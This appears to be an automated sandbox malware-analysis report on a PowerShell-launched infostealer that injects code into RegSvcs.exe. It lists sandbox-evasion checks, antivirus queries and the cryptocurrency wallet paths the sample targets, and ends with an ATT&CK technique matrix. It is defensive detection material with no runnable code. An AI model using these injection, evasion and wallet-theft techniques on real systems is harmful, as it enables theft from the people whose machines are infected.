      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4496Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4103Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2420Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7350Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -2767011611056431s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: RegSvcs.exe, 00000003.00000002.3816487193.0000000005DDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Physical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MB\
      Source: RegSvcs.exe, 00000003.00000002.3816175111.0000000005824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: RegSvcs.exe, 00000003.00000002.3816487193.0000000005DDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
      Source: RegSvcs.exe, 00000003.00000002.3798554954.000000000103B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhm
      Source: RegSvcs.exe, 00000003.00000002.3815891659.000000000580F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0v
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 452000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 454000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CD5008Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
      Source: RegSvcs.exe, 00000003.00000002.3802429612.0000000003485000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3802429612.00000000033ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3802429612.00000000031FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: RegSvcs.exe, 00000003.00000002.3802429612.0000000003485000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3802429612.00000000033ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3802429612.00000000032B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager*
      Source: RegSvcs.exe, 00000003.00000002.3802429612.0000000003485000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3802429612.00000000033ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3802429612.00000000031FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: RegSvcs.exe, 00000003.00000002.3816487193.0000000005DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
      Source: RegSvcs.exe, 00000003.00000002.3802429612.00000000032B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx@\
      Source: RegSvcs.exe, 00000003.00000002.3802429612.00000000032B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q2C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
      Source: RegSvcs.exe, 00000003.00000002.3816487193.0000000005DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreT
      Source: RegSvcs.exe, 00000003.00000002.3802429612.00000000032B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus@\
      Source: RegSvcs.exe, 00000003.00000002.3816487193.0000000005DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreT
      Source: powershell.exe, 00000000.00000002.1421062038.00007FF887BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
      Source: Yara matchFile source: 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7648, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
      Windows Management Instrumentation
      1
      DLL Side-Loading
      212
      Process Injection
      1
      Disable or Modify Tools
      OS Credential Dumping421
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      331
      Virtualization/Sandbox Evasion
      LSASS Memory2
      Process Discovery
      Remote Desktop Protocol1
      Data from Local System
      1
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)212
      Process Injection
      Security Account Manager331
      Virtualization/Sandbox Evasion
      SMB/Windows Admin Shares1
      Clipboard Data
      1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture1
      Application Layer Protocol
      Traffic DuplicationData Destruction
